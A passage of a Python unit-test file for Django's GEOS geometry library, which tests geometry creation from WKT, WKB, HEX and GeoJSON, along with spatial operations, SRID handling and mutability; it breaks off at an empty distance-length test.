with self.assertRaises(TypeError):
GEOSGeometry(None)
def test_wkb(self):
"Testing WKB output."
for g in self.geometries.hex_wkt:
geom = fromstr(g.wkt)
wkb = geom.wkb
self.assertEqual(wkb.hex().upper(), g.hex)
def test_create_hex(self):
"Testing creation from HEX."
for g in self.geometries.hex_wkt:
geom_h = GEOSGeometry(g.hex)
# we need to do this so decimal places get normalized
geom_t = fromstr(g.wkt)
self.assertEqual(geom_t.wkt, geom_h.wkt)
def test_create_wkb(self):
"Testing creation from WKB."
for g in self.geometries.hex_wkt:
wkb = memoryview(bytes.fromhex(g.hex))
geom_h = GEOSGeometry(wkb)
# we need to do this so decimal places get normalized
geom_t = fromstr(g.wkt)
self.assertEqual(geom_t.wkt, geom_h.wkt)
def test_ewkt(self):
"Testing EWKT."
srids = (-1, 32140)
for srid in srids:
for p in self.geometries.polygons:
ewkt = 'SRID=%d;%s' % (srid, p.wkt)
poly = fromstr(ewkt)
self.assertEqual(srid, poly.srid)
self.assertEqual(srid, poly.shell.srid)
self.assertEqual(srid, fromstr(poly.ewkt).srid) # Checking export
def test_json(self):
"Testing GeoJSON input/output (via GDAL)."
for g in self.geometries.json_geoms:
geom = GEOSGeometry(g.wkt)
if not hasattr(g, 'not_equal'):
# Loading jsons to prevent decimal differences
self.assertEqual(json.loads(g.json), json.loads(geom.json))
self.assertEqual(json.loads(g.json), json.loads(geom.geojson))
self.assertEqual(GEOSGeometry(g.wkt, 4326), GEOSGeometry(geom.json))
def test_json_srid(self):
geojson_data = {
"type": "Point",
"coordinates": [2, 49],
"crs": {
"type": "name",
"properties": {
"name": "urn:ogc:def:crs:EPSG::4322"
}
}
}
self.assertEqual(GEOSGeometry(json.dumps(geojson_data)), Point(2, 49, srid=4322))
def test_fromfile(self):
"Testing the fromfile() factory."
ref_pnt = GEOSGeometry('POINT(5 23)')
wkt_f = BytesIO()
wkt_f.write(ref_pnt.wkt.encode())
wkb_f = BytesIO()
wkb_f.write(bytes(ref_pnt.wkb))
# Other tests use `fromfile()` on string filenames so those
# aren't tested here.
for fh in (wkt_f, wkb_f):
fh.seek(0)
pnt = fromfile(fh)
self.assertEqual(ref_pnt, pnt)
def test_eq(self):
"Testing equivalence."
p = fromstr('POINT(5 23)')
self.assertEqual(p, p.wkt)
self.assertNotEqual(p, 'foo')
ls = fromstr('LINESTRING(0 0, 1 1, 5 5)')
self.assertEqual(ls, ls.wkt)
self.assertNotEqual(p, 'bar')
self.assertEqual(p, 'POINT(5.0 23.0)')
# Error shouldn't be raise on equivalence testing with
# an invalid type.
for g in (p, ls):
self.assertIsNotNone(g)
self.assertNotEqual(g, {'foo': 'bar'})
self.assertIsNot(g, False)
def test_hash(self):
point_1 = Point(5, 23)
point_2 = Point(5, 23, srid=4326)
point_3 = Point(5, 23, srid=32632)
multipoint_1 = MultiPoint(point_1, srid=4326)
multipoint_2 = MultiPoint(point_2)
multipoint_3 = MultiPoint(point_3)
self.assertNotEqual(hash(point_1), hash(point_2))
self.assertNotEqual(hash(point_1), hash(point_3))
self.assertNotEqual(hash(point_2), hash(point_3))
self.assertNotEqual(hash(multipoint_1), hash(multipoint_2))
self.assertEqual(hash(multipoint_2), hash(multipoint_3))
self.assertNotEqual(hash(multipoint_1), hash(point_1))
self.assertNotEqual(hash(multipoint_2), hash(point_2))
self.assertNotEqual(hash(multipoint_3), hash(point_3))
def test_eq_with_srid(self):
"Testing non-equivalence with different srids."
p0 = Point(5, 23)
p1 = Point(5, 23, srid=4326)
p2 = Point(5, 23, srid=32632)
# GEOS
self.assertNotEqual(p0, p1)
self.assertNotEqual(p1, p2)
# EWKT
self.assertNotEqual(p0, p1.ewkt)
self.assertNotEqual(p1, p0.ewkt)
self.assertNotEqual(p1, p2.ewkt)
# Equivalence with matching SRIDs
self.assertEqual(p2, p2)
self.assertEqual(p2, p2.ewkt)
# WKT contains no SRID so will not equal
self.assertNotEqual(p2, p2.wkt)
# SRID of 0
self.assertEqual(p0, 'SRID=0;POINT (5 23)')
self.assertNotEqual(p1, 'SRID=0;POINT (5 23)')
def test_points(self):
"Testing Point objects."
prev = fromstr('POINT(0 0)')
for p in self.geometries.points:
# Creating the point from the WKT
pnt = fromstr(p.wkt)
self.assertEqual(pnt.geom_type, 'Point')
self.assertEqual(pnt.geom_typeid, 0)
self.assertEqual(pnt.dims, 0)
self.assertEqual(p.x, pnt.x)
self.assertEqual(p.y, pnt.y)
self.assertEqual(pnt, fromstr(p.wkt))
self.assertIs(pnt == prev, False) # Use assertIs() to test __eq__.
# Making sure that the point's X, Y components are what we expect
self.assertAlmostEqual(p.x, pnt.tuple[0], 9)
self.assertAlmostEqual(p.y, pnt.tuple[1], 9)
# Testing the third dimension, and getting the tuple arguments
if hasattr(p, 'z'):
self.assertIs(pnt.hasz, True)
self.assertEqual(p.z, pnt.z)
self.assertEqual(p.z, pnt.tuple[2], 9)
tup_args = (p.x, p.y, p.z)
set_tup1 = (2.71, 3.14, 5.23)
set_tup2 = (5.23, 2.71, 3.14)
else:
self.assertIs(pnt.hasz, False)
self.assertIsNone(pnt.z)
tup_args = (p.x, p.y)
set_tup1 = (2.71, 3.14)
set_tup2 = (3.14, 2.71)
# Centroid operation on point should be point itself
self.assertEqual(p.centroid, pnt.centroid.tuple)
# Now testing the different constructors
pnt2 = Point(tup_args) # e.g., Point((1, 2))
pnt3 = Point(*tup_args) # e.g., Point(1, 2)
self.assertEqual(pnt, pnt2)
self.assertEqual(pnt, pnt3)
# Now testing setting the x and y
pnt.y = 3.14
pnt.x = 2.71
self.assertEqual(3.14, pnt.y)
self.assertEqual(2.71, pnt.x)
# Setting via the tuple/coords property
pnt.tuple = set_tup1
self.assertEqual(set_tup1, pnt.tuple)
pnt.coords = set_tup2
self.assertEqual(set_tup2, pnt.coords)
prev = pnt # setting the previous geometry
def test_point_reverse(self):
point = GEOSGeometry('POINT(144.963 -37.8143)', 4326)
self.assertEqual(point.srid, 4326)
point.reverse()
self.assertEqual(point.ewkt, 'SRID=4326;POINT (-37.8143 144.963)')
def test_multipoints(self):
"Testing MultiPoint objects."
for mp in self.geometries.multipoints:
mpnt = fromstr(mp.wkt)
self.assertEqual(mpnt.geom_type, 'MultiPoint')
self.assertEqual(mpnt.geom_typeid, 4)
self.assertEqual(mpnt.dims, 0)
self.assertAlmostEqual(mp.centroid[0], mpnt.centroid.tuple[0], 9)
self.assertAlmostEqual(mp.centroid[1], mpnt.centroid.tuple[1], 9)
with self.assertRaises(IndexError):
mpnt.__getitem__(len(mpnt))
self.assertEqual(mp.centroid, mpnt.centroid.tuple)
self.assertEqual(mp.coords, tuple(m.tuple for m in mpnt))
for p in mpnt:
self.assertEqual(p.geom_type, 'Point')
self.assertEqual(p.geom_typeid, 0)
self.assertIs(p.empty, False)
self.assertIs(p.valid, True)
def test_linestring(self):
"Testing LineString objects."
prev = fromstr('POINT(0 0)')
for line in self.geometries.linestrings:
ls = fromstr(line.wkt)
self.assertEqual(ls.geom_type, 'LineString')
self.assertEqual(ls.geom_typeid, 1)
self.assertEqual(ls.dims, 1)
self.assertIs(ls.empty, False)
self.assertIs(ls.ring, False)
if hasattr(line, 'centroid'):
self.assertEqual(line.centroid, ls.centroid.tuple)
if hasattr(line, 'tup'):
self.assertEqual(line.tup, ls.tuple)
self.assertEqual(ls, fromstr(line.wkt))
self.assertIs(ls == prev, False) # Use assertIs() to test __eq__.
with self.assertRaises(IndexError):
ls.__getitem__(len(ls))
prev = ls
# Creating a LineString from a tuple, list, and numpy array
self.assertEqual(ls, LineString(ls.tuple)) # tuple
self.assertEqual(ls, LineString(*ls.tuple)) # as individual arguments
self.assertEqual(ls, LineString([list(tup) for tup in ls.tuple])) # as list
# Point individual arguments
self.assertEqual(ls.wkt, LineString(*tuple(Point(tup) for tup in ls.tuple)).wkt)
if numpy:
self.assertEqual(ls, LineString(numpy.array(ls.tuple))) # as numpy array
with self.assertRaisesMessage(TypeError, 'Each coordinate should be a sequence (list or tuple)'):
LineString((0, 0))
with self.assertRaisesMessage(ValueError, 'LineString requires at least 2 points, got 1.'):
LineString([(0, 0)])
if numpy:
with self.assertRaisesMessage(ValueError, 'LineString requires at least 2 points, got 1.'):
LineString(numpy.array([(0, 0)]))
with mock.patch('django.contrib.gis.geos.linestring.numpy', False):
with self.assertRaisesMessage(TypeError, 'Invalid initialization input for LineStrings.'):
LineString('wrong input')
# Test __iter__().
self.assertEqual(list(LineString((0, 0), (1, 1), (2, 2))), [(0, 0), (1, 1), (2, 2)])
def test_linestring_reverse(self):
line = GEOSGeometry('LINESTRING(144.963 -37.8143,151.2607 -33.887)', 4326)
self.assertEqual(line.srid, 4326)
line.reverse()
self.assertEqual(line.ewkt, 'SRID=4326;LINESTRING (151.2607 -33.887, 144.963 -37.8143)')
def _test_is_counterclockwise(self):
lr = LinearRing((0, 0), (1, 0), (0, 1), (0, 0))
self.assertIs(lr.is_counterclockwise, True)
lr.reverse()
self.assertIs(lr.is_counterclockwise, False)
msg = 'Orientation of an empty LinearRing cannot be determined.'
with self.assertRaisesMessage(ValueError, msg):
LinearRing().is_counterclockwise
@skipIf(geos_version_tuple() < (3, 7), 'GEOS >= 3.7.0 is required')
def test_is_counterclockwise(self):
self._test_is_counterclockwise()
@skipIf(geos_version_tuple() < (3, 7), 'GEOS >= 3.7.0 is required')
def test_is_counterclockwise_geos_error(self):
with mock.patch('django.contrib.gis.geos.prototypes.cs_is_ccw') as mocked:
mocked.return_value = 0
mocked.func_name = 'GEOSCoordSeq_isCCW'
msg = 'Error encountered in GEOS C function "GEOSCoordSeq_isCCW".'
with self.assertRaisesMessage(GEOSException, msg):
LinearRing((0, 0), (1, 0), (0, 1), (0, 0)).is_counterclockwise
@mock.patch('django.contrib.gis.geos.libgeos.geos_version', lambda: b'3.6.9')
def test_is_counterclockwise_fallback(self):
self._test_is_counterclockwise()
def test_multilinestring(self):
"Testing MultiLineString objects."
prev = fromstr('POINT(0 0)')
for line in self.geometries.multilinestrings:
ml = fromstr(line.wkt)
self.assertEqual(ml.geom_type, 'MultiLineString')
self.assertEqual(ml.geom_typeid, 5)
self.assertEqual(ml.dims, 1)
self.assertAlmostEqual(line.centroid[0], ml.centroid.x, 9)
self.assertAlmostEqual(line.centroid[1], ml.centroid.y, 9)
self.assertEqual(ml, fromstr(line.wkt))
self.assertIs(ml == prev, False) # Use assertIs() to test __eq__.
prev = ml
for ls in ml:
self.assertEqual(ls.geom_type, 'LineString')
self.assertEqual(ls.geom_typeid, 1)
self.assertIs(ls.empty, False)
with self.assertRaises(IndexError):
ml.__getitem__(len(ml))
self.assertEqual(ml.wkt, MultiLineString(*tuple(s.clone() for s in ml)).wkt)
self.assertEqual(ml, MultiLineString(*tuple(LineString(s.tuple) for s in ml)))
def test_linearring(self):
"Testing LinearRing objects."
for rr in self.geometries.linearrings:
lr = fromstr(rr.wkt)
self.assertEqual(lr.geom_type, 'LinearRing')
self.assertEqual(lr.geom_typeid, 2)
self.assertEqual(lr.dims, 1)
self.assertEqual(rr.n_p, len(lr))
self.assertIs(lr.valid, True)
self.assertIs(lr.empty, False)
# Creating a LinearRing from a tuple, list, and numpy array
self.assertEqual(lr, LinearRing(lr.tuple))
self.assertEqual(lr, LinearRing(*lr.tuple))
self.assertEqual(lr, LinearRing([list(tup) for tup in lr.tuple]))
if numpy:
self.assertEqual(lr, LinearRing(numpy.array(lr.tuple)))
with self.assertRaisesMessage(ValueError, 'LinearRing requires at least 4 points, got 3.'):
LinearRing((0, 0), (1, 1), (0, 0))
with self.assertRaisesMessage(ValueError, 'LinearRing requires at least 4 points, got 1.'):
LinearRing([(0, 0)])
if numpy:
with self.assertRaisesMessage(ValueError, 'LinearRing requires at least 4 points, got 1.'):
LinearRing(numpy.array([(0, 0)]))
def test_linearring_json(self):
self.assertJSONEqual(
LinearRing((0, 0), (0, 1), (1, 1), (0, 0)).json,
'{"coordinates": [[0, 0], [0, 1], [1, 1], [0, 0]], "type": "LineString"}',
)
def test_polygons_from_bbox(self):
"Testing `from_bbox` class method."
bbox = (-180, -90, 180, 90)
p = Polygon.from_bbox(bbox)
self.assertEqual(bbox, p.extent)
# Testing numerical precision
x = 3.14159265358979323
bbox = (0, 0, 1, x)
p = Polygon.from_bbox(bbox)
y = p.extent[-1]
self.assertEqual(format(x, '.13f'), format(y, '.13f'))
def test_polygons(self):
"Testing Polygon objects."
prev = fromstr('POINT(0 0)')
for p in self.geometries.polygons:
# Creating the Polygon, testing its properties.
poly = fromstr(p.wkt)
self.assertEqual(poly.geom_type, 'Polygon')
self.assertEqual(poly.geom_typeid, 3)
self.assertEqual(poly.dims, 2)
self.assertIs(poly.empty, False)
self.assertIs(poly.ring, False)
self.assertEqual(p.n_i, poly.num_interior_rings)
self.assertEqual(p.n_i + 1, len(poly)) # Testing __len__
self.assertEqual(p.n_p, poly.num_points)
# Area & Centroid
self.assertAlmostEqual(p.area, poly.area, 9)
self.assertAlmostEqual(p.centroid[0], poly.centroid.tuple[0], 9)
self.assertAlmostEqual(p.centroid[1], poly.centroid.tuple[1], 9)
# Testing the geometry equivalence
self.assertEqual(poly, fromstr(p.wkt))
# Should not be equal to previous geometry
self.assertIs(poly == prev, False) # Use assertIs() to test __eq__.
self.assertIs(poly != prev, True) # Use assertIs() to test __ne__.
# Testing the exterior ring
ring = poly.exterior_ring
self.assertEqual(ring.geom_type, 'LinearRing')
self.assertEqual(ring.geom_typeid, 2)
if p.ext_ring_cs:
self.assertEqual(p.ext_ring_cs, ring.tuple)
self.assertEqual(p.ext_ring_cs, poly[0].tuple) # Testing __getitem__
# Testing __getitem__ and __setitem__ on invalid indices
with self.assertRaises(IndexError):
poly.__getitem__(len(poly))
with self.assertRaises(IndexError):
poly.__setitem__(len(poly), False)
with self.assertRaises(IndexError):
poly.__getitem__(-1 * len(poly) - 1)
# Testing __iter__
for r in poly:
self.assertEqual(r.geom_type, 'LinearRing')
self.assertEqual(r.geom_typeid, 2)
# Testing polygon construction.
with self.assertRaises(TypeError):
Polygon(0, [1, 2, 3])
with self.assertRaises(TypeError):
Polygon('foo')
# Polygon(shell, (hole1, ... holeN))
ext_ring, *int_rings = poly
self.assertEqual(poly, Polygon(ext_ring, int_rings))
# Polygon(shell_tuple, hole_tuple1, ... , hole_tupleN)
ring_tuples = tuple(r.tuple for r in poly)
self.assertEqual(poly, Polygon(*ring_tuples))
# Constructing with tuples of LinearRings.
self.assertEqual(poly.wkt, Polygon(*tuple(r for r in poly)).wkt)
self.assertEqual(poly.wkt, Polygon(*tuple(LinearRing(r.tuple) for r in poly)).wkt)
def test_polygons_templates(self):
# Accessing Polygon attributes in templates should work.
engine = Engine()
template = engine.from_string('{{ polygons.0.wkt }}')
polygons = [fromstr(p.wkt) for p in self.geometries.multipolygons[:2]]
content = template.render(Context({'polygons': polygons}))
self.assertIn('MULTIPOLYGON (((100', content)
def test_polygon_comparison(self):
p1 = Polygon(((0, 0), (0, 1), (1, 1), (1, 0), (0, 0)))
p2 = Polygon(((0, 0), (0, 1), (1, 0), (0, 0)))
self.assertGreater(p1, p2)
self.assertLess(p2, p1)
p3 = Polygon(((0, 0), (0, 1), (1, 1), (2, 0), (0, 0)))
p4 = Polygon(((0, 0), (0, 1), (2, 2), (1, 0), (0, 0)))
self.assertGreater(p4, p3)
self.assertLess(p3, p4)
def test_multipolygons(self):
"Testing MultiPolygon objects."
fromstr('POINT (0 0)')
for mp in self.geometries.multipolygons:
mpoly = fromstr(mp.wkt)
self.assertEqual(mpoly.geom_type, 'MultiPolygon')
self.assertEqual(mpoly.geom_typeid, 6)
self.assertEqual(mpoly.dims, 2)
self.assertEqual(mp.valid, mpoly.valid)
if mp.valid:
self.assertEqual(mp.num_geom, mpoly.num_geom)
self.assertEqual(mp.n_p, mpoly.num_coords)
self.assertEqual(mp.num_geom, len(mpoly))
with self.assertRaises(IndexError):
mpoly.__getitem__(len(mpoly))
for p in mpoly:
self.assertEqual(p.geom_type, 'Polygon')
self.assertEqual(p.geom_typeid, 3)
self.assertIs(p.valid, True)
self.assertEqual(mpoly.wkt, MultiPolygon(*tuple(poly.clone() for poly in mpoly)).wkt)
def test_memory_hijinks(self):
"Testing Geometry __del__() on rings and polygons."
# #### Memory issues with rings and poly
# These tests are needed to ensure sanity with writable geometries.
# Getting a polygon with interior rings, and pulling out the interior rings
poly = fromstr(self.geometries.polygons[1].wkt)
ring1 = poly[0]
ring2 = poly[1]
# These deletes should be 'harmless' since they are done on child geometries
del ring1
del ring2
ring1 = poly[0]
ring2 = poly[1]
# Deleting the polygon
del poly
# Access to these rings is OK since they are clones.
str(ring1)
str(ring2)
def test_coord_seq(self):
"Testing Coordinate Sequence objects."
for p in self.geometries.polygons:
if p.ext_ring_cs:
# Constructing the polygon and getting the coordinate sequence
poly = fromstr(p.wkt)
cs = poly.exterior_ring.coord_seq
self.assertEqual(p.ext_ring_cs, cs.tuple) # done in the Polygon test too.
self.assertEqual(len(p.ext_ring_cs), len(cs)) # Making sure __len__ works
# Checks __getitem__ and __setitem__
for i in range(len(p.ext_ring_cs)):
c1 = p.ext_ring_cs[i] # Expected value
c2 = cs[i] # Value from coordseq
self.assertEqual(c1, c2)
# Constructing the test value to set the coordinate sequence with
if len(c1) == 2:
tset = (5, 23)
else:
tset = (5, 23, 8)
cs[i] = tset
# Making sure every set point matches what we expect
for j in range(len(tset)):
cs[i] = tset
self.assertEqual(tset[j], cs[i][j])
def test_relate_pattern(self):
"Testing relate() and relate_pattern()."
g = fromstr('POINT (0 0)')
with self.assertRaises(GEOSException):
g.relate_pattern(0, 'invalid pattern, yo')
for rg in self.geometries.relate_geoms:
a = fromstr(rg.wkt_a)
b = fromstr(rg.wkt_b)
self.assertEqual(rg.result, a.relate_pattern(b, rg.pattern))
self.assertEqual(rg.pattern, a.relate(b))
def test_intersection(self):
"Testing intersects() and intersection()."
for i in range(len(self.geometries.topology_geoms)):
a = fromstr(self.geometries.topology_geoms[i].wkt_a)
b = fromstr(self.geometries.topology_geoms[i].wkt_b)
i1 = fromstr(self.geometries.intersect_geoms[i].wkt)
self.assertIs(a.intersects(b), True)
i2 = a.intersection(b)
self.assertTrue(i1.equals(i2))
self.assertTrue(i1.equals(a & b)) # __and__ is intersection operator
a &= b # testing __iand__
self.assertTrue(i1.equals(a))
def test_union(self):
"Testing union()."
for i in range(len(self.geometries.topology_geoms)):
a = fromstr(self.geometries.topology_geoms[i].wkt_a)
b = fromstr(self.geometries.topology_geoms[i].wkt_b)
u1 = fromstr(self.geometries.union_geoms[i].wkt)
u2 = a.union(b)
self.assertTrue(u1.equals(u2))
self.assertTrue(u1.equals(a | b)) # __or__ is union operator
a |= b # testing __ior__
self.assertTrue(u1.equals(a))
def test_unary_union(self):
"Testing unary_union."
for i in range(len(self.geometries.topology_geoms)):
a = fromstr(self.geometries.topology_geoms[i].wkt_a)
b = fromstr(self.geometries.topology_geoms[i].wkt_b)
u1 = fromstr(self.geometries.union_geoms[i].wkt)
u2 = GeometryCollection(a, b).unary_union
self.assertTrue(u1.equals(u2))
def test_difference(self):
"Testing difference()."
for i in range(len(self.geometries.topology_geoms)):
a = fromstr(self.geometries.topology_geoms[i].wkt_a)
b = fromstr(self.geometries.topology_geoms[i].wkt_b)
d1 = fromstr(self.geometries.diff_geoms[i].wkt)
d2 = a.difference(b)
self.assertTrue(d1.equals(d2))
self.assertTrue(d1.equals(a - b)) # __sub__ is difference operator
a -= b # testing __isub__
self.assertTrue(d1.equals(a))
def test_symdifference(self):
"Testing sym_difference()."
for i in range(len(self.geometries.topology_geoms)):
a = fromstr(self.geometries.topology_geoms[i].wkt_a)
b = fromstr(self.geometries.topology_geoms[i].wkt_b)
d1 = fromstr(self.geometries.sdiff_geoms[i].wkt)
d2 = a.sym_difference(b)
self.assertTrue(d1.equals(d2))
self.assertTrue(d1.equals(a ^ b)) # __xor__ is symmetric difference operator
a ^= b # testing __ixor__
self.assertTrue(d1.equals(a))
def test_buffer(self):
bg = self.geometries.buffer_geoms[0]
g = fromstr(bg.wkt)
# Can't use a floating-point for the number of quadsegs.
with self.assertRaises(ctypes.ArgumentError):
g.buffer(bg.width, quadsegs=1.1)
self._test_buffer(self.geometries.buffer_geoms, 'buffer')
def test_buffer_with_style(self):
bg = self.geometries.buffer_with_style_geoms[0]
g = fromstr(bg.wkt)
# Can't use a floating-point for the number of quadsegs.
with self.assertRaises(ctypes.ArgumentError):
g.buffer_with_style(bg.width, quadsegs=1.1)
# Can't use a floating-point for the end cap style.
with self.assertRaises(ctypes.ArgumentError):
g.buffer_with_style(bg.width, end_cap_style=1.2)
# Can't use a end cap style that is not in the enum.
with self.assertRaises(GEOSException):
g.buffer_with_style(bg.width, end_cap_style=55)
# Can't use a floating-point for the join style.
with self.assertRaises(ctypes.ArgumentError):
g.buffer_with_style(bg.width, join_style=1.3)
# Can't use a join style that is not in the enum.
with self.assertRaises(GEOSException):
g.buffer_with_style(bg.width, join_style=66)
self._test_buffer(
itertools.chain(self.geometries.buffer_geoms, self.geometries.buffer_with_style_geoms),
'buffer_with_style',
)
def _test_buffer(self, geometries, buffer_method_name):
for bg in geometries:
g = fromstr(bg.wkt)
# The buffer we expect
exp_buf = fromstr(bg.buffer_wkt)
# Constructing our buffer
buf_kwargs = {
kwarg_name: getattr(bg, kwarg_name)
for kwarg_name in ('width', 'quadsegs', 'end_cap_style', 'join_style', 'mitre_limit')
if hasattr(bg, kwarg_name)
}
buf = getattr(g, buffer_method_name)(**buf_kwargs)
self.assertEqual(exp_buf.num_coords, buf.num_coords)
self.assertEqual(len(exp_buf), len(buf))
# Now assuring that each point in the buffer is almost equal
for j in range(len(exp_buf)):
exp_ring = exp_buf[j]
buf_ring = buf[j]
self.assertEqual(len(exp_ring), len(buf_ring))
for k in range(len(exp_ring)):
# Asserting the X, Y of each point are almost equal (due to floating point imprecision)
self.assertAlmostEqual(exp_ring[k][0], buf_ring[k][0], 9)
self.assertAlmostEqual(exp_ring[k][1], buf_ring[k][1], 9)
def test_covers(self):
poly = Polygon(((0, 0), (0, 10), (10, 10), (10, 0), (0, 0)))
self.assertTrue(poly.covers(Point(5, 5)))
self.assertFalse(poly.covers(Point(100, 100)))
def test_closed(self):
ls_closed = LineString((0, 0), (1, 1), (0, 0))
ls_not_closed = LineString((0, 0), (1, 1))
self.assertFalse(ls_not_closed.closed)
self.assertTrue(ls_closed.closed)
def test_srid(self):
"Testing the SRID property and keyword."
# Testing SRID keyword on Point
pnt = Point(5, 23, srid=4326)
self.assertEqual(4326, pnt.srid)
pnt.srid = 3084
self.assertEqual(3084, pnt.srid)
with self.assertRaises(ctypes.ArgumentError):
pnt.srid = '4326'
# Testing SRID keyword on fromstr(), and on Polygon rings.
poly = fromstr(self.geometries.polygons[1].wkt, srid=4269)
self.assertEqual(4269, poly.srid)
for ring in poly:
self.assertEqual(4269, ring.srid)
poly.srid = 4326
self.assertEqual(4326, poly.shell.srid)
# Testing SRID keyword on GeometryCollection
gc = GeometryCollection(Point(5, 23), LineString((0, 0), (1.5, 1.5), (3, 3)), srid=32021)
self.assertEqual(32021, gc.srid)
for i in range(len(gc)):
self.assertEqual(32021, gc[i].srid)
# GEOS may get the SRID from HEXEWKB
# 'POINT(5 23)' at SRID=4326 in hex form -- obtained from PostGIS
# using `SELECT GeomFromText('POINT (5 23)', 4326);`.
hex = '0101000020E610000000000000000014400000000000003740'
p1 = fromstr(hex)
self.assertEqual(4326, p1.srid)
p2 = fromstr(p1.hex)
self.assertIsNone(p2.srid)
p3 = fromstr(p1.hex, srid=-1) # -1 is intended.
self.assertEqual(-1, p3.srid)
# Testing that geometry SRID could be set to its own value
pnt_wo_srid = Point(1, 1)
pnt_wo_srid.srid = pnt_wo_srid.srid
# Input geometries that have an SRID.
self.assertEqual(GEOSGeometry(pnt.ewkt, srid=pnt.srid).srid, pnt.srid)
self.assertEqual(GEOSGeometry(pnt.ewkb, srid=pnt.srid).srid, pnt.srid)
with self.assertRaisesMessage(ValueError, 'Input geometry already has SRID: %d.' % pnt.srid):
GEOSGeometry(pnt.ewkt, srid=1)
with self.assertRaisesMessage(ValueError, 'Input geometry already has SRID: %d.' % pnt.srid):
GEOSGeometry(pnt.ewkb, srid=1)
def test_custom_srid(self):
"""Test with a null srid and a srid unknown to GDAL."""
for srid in [None, 999999]:
pnt = Point(111200, 220900, srid=srid)
self.assertTrue(pnt.ewkt.startswith(("SRID=%s;" % srid if srid else '') + "POINT (111200"))
self.assertIsInstance(pnt.ogr, gdal.OGRGeometry)
self.assertIsNone(pnt.srs)
# Test conversion from custom to a known srid
c2w = gdal.CoordTransform(
gdal.SpatialReference(
'+proj=mill +lat_0=0 +lon_0=0 +x_0=0 +y_0=0 +R_A +ellps=WGS84 '
'+datum=WGS84 +units=m +no_defs'
),
gdal.SpatialReference(4326))
new_pnt = pnt.transform(c2w, clone=True)
self.assertEqual(new_pnt.srid, 4326)
self.assertAlmostEqual(new_pnt.x, 1, 1)
self.assertAlmostEqual(new_pnt.y, 2, 1)
def test_mutable_geometries(self):
"Testing the mutability of Polygons and Geometry Collections."
# ### Testing the mutability of Polygons ###
for p in self.geometries.polygons:
poly = fromstr(p.wkt)
# Should only be able to use __setitem__ with LinearRing geometries.
with self.assertRaises(TypeError):
poly.__setitem__(0, LineString((1, 1), (2, 2)))
# Constructing the new shell by adding 500 to every point in the old shell.
shell_tup = poly.shell.tuple
new_coords = []
for point in shell_tup:
new_coords.append((point[0] + 500., point[1] + 500.))
new_shell = LinearRing(*tuple(new_coords))
# Assigning polygon's exterior ring w/the new shell
poly.exterior_ring = new_shell
str(new_shell) # new shell is still accessible
self.assertEqual(poly.exterior_ring, new_shell)
self.assertEqual(poly[0], new_shell)
# ### Testing the mutability of Geometry Collections
for tg in self.geometries.multipoints:
mp = fromstr(tg.wkt)
for i in range(len(mp)):
# Creating a random point.
pnt = mp[i]
new = Point(random.randint(21, 100), random.randint(21, 100))
# Testing the assignment
mp[i] = new
str(new) # what was used for the assignment is still accessible
self.assertEqual(mp[i], new)
self.assertEqual(mp[i].wkt, new.wkt)
self.assertNotEqual(pnt, mp[i])
# MultiPolygons involve much more memory management because each
# Polygon w/in the collection has its own rings.
for tg in self.geometries.multipolygons:
mpoly = fromstr(tg.wkt)
for i in range(len(mpoly)):
poly = mpoly[i]
old_poly = mpoly[i]
# Offsetting the each ring in the polygon by 500.
for j in range(len(poly)):
r = poly[j]
for k in range(len(r)):
r[k] = (r[k][0] + 500., r[k][1] + 500.)
poly[j] = r
self.assertNotEqual(mpoly[i], poly)
# Testing the assignment
mpoly[i] = poly
str(poly) # Still accessible
self.assertEqual(mpoly[i], poly)
self.assertNotEqual(mpoly[i], old_poly)
# Extreme (!!) __setitem__ -- no longer works, have to detect
# in the first object that __setitem__ is called in the subsequent
# objects -- maybe mpoly[0, 0, 0] = (3.14, 2.71)?
# mpoly[0][0][0] = (3.14, 2.71)
# self.assertEqual((3.14, 2.71), mpoly[0][0][0])
# Doing it more slowly..
# self.assertEqual((3.14, 2.71), mpoly[0].shell[0])
# del mpoly
def test_point_list_assignment(self):
p = Point(0, 0)
p[:] = (1, 2, 3)
self.assertEqual(p, Point(1, 2, 3))
p[:] = ()
self.assertEqual(p.wkt, Point())
p[:] = (1, 2)
self.assertEqual(p.wkt, Point(1, 2))
with self.assertRaises(ValueError):
p[:] = (1,)
with self.assertRaises(ValueError):
p[:] = (1, 2, 3, 4, 5)
def test_linestring_list_assignment(self):
ls = LineString((0, 0), (1, 1))
ls[:] = ()
self.assertEqual(ls, LineString())
ls[:] = ((0, 0), (1, 1), (2, 2))
self.assertEqual(ls, LineString((0, 0), (1, 1), (2, 2)))
with self.assertRaises(ValueError):
ls[:] = (1,)
def test_linearring_list_assignment(self):
ls = LinearRing((0, 0), (0, 1), (1, 1), (0, 0))
ls[:] = ()
self.assertEqual(ls, LinearRing())
ls[:] = ((0, 0), (0, 1), (1, 1), (1, 0), (0, 0))
self.assertEqual(ls, LinearRing((0, 0), (0, 1), (1, 1), (1, 0), (0, 0)))
with self.assertRaises(ValueError):
ls[:] = ((0, 0), (1, 1), (2, 2))
def test_polygon_list_assignment(self):
pol = Polygon()
pol[:] = (((0, 0), (0, 1), (1, 1), (1, 0), (0, 0)),)
self.assertEqual(pol, Polygon(((0, 0), (0, 1), (1, 1), (1, 0), (0, 0)),))
pol[:] = ()
self.assertEqual(pol, Polygon())
def test_geometry_collection_list_assignment(self):
p = Point()
gc = GeometryCollection()
gc[:] = [p]
self.assertEqual(gc, GeometryCollection(p))
gc[:] = ()
self.assertEqual(gc, GeometryCollection())
def test_threed(self):
"Testing three-dimensional geometries."
# Testing a 3D Point
pnt = Point(2, 3, 8)
self.assertEqual((2., 3., 8.), pnt.coords)
with self.assertRaises(TypeError):
pnt.tuple = (1., 2.)
pnt.coords = (1., 2., 3.)
self.assertEqual((1., 2., 3.), pnt.coords)
# Testing a 3D LineString
ls = LineString((2., 3., 8.), (50., 250., -117.))
self.assertEqual(((2., 3., 8.), (50., 250., -117.)), ls.tuple)
with self.assertRaises(TypeError):
ls.__setitem__(0, (1., 2.))
ls[0] = (1., 2., 3.)
self.assertEqual((1., 2., 3.), ls[0])
def test_distance(self):
"Testing the distance() function."
# Distance to self should be 0.
pnt = Point(0, 0)
self.assertEqual(0.0, pnt.distance(Point(0, 0)))
# Distance should be 1
self.assertEqual(1.0, pnt.distance(Point(0, 1)))
# Distance should be ~ sqrt(2)
self.assertAlmostEqual(1.41421356237, pnt.distance(Point(1, 1)), 11)
# Distances are from the closest vertex in each geometry --
# should be 3 (distance from (2, 2) to (5, 2)).
ls1 = LineString((0, 0), (1, 1), (2, 2))
ls2 = LineString((5, 2), (6, 1), (7, 0))
self.assertEqual(3, ls1.distance(ls2))
def test_length(self):
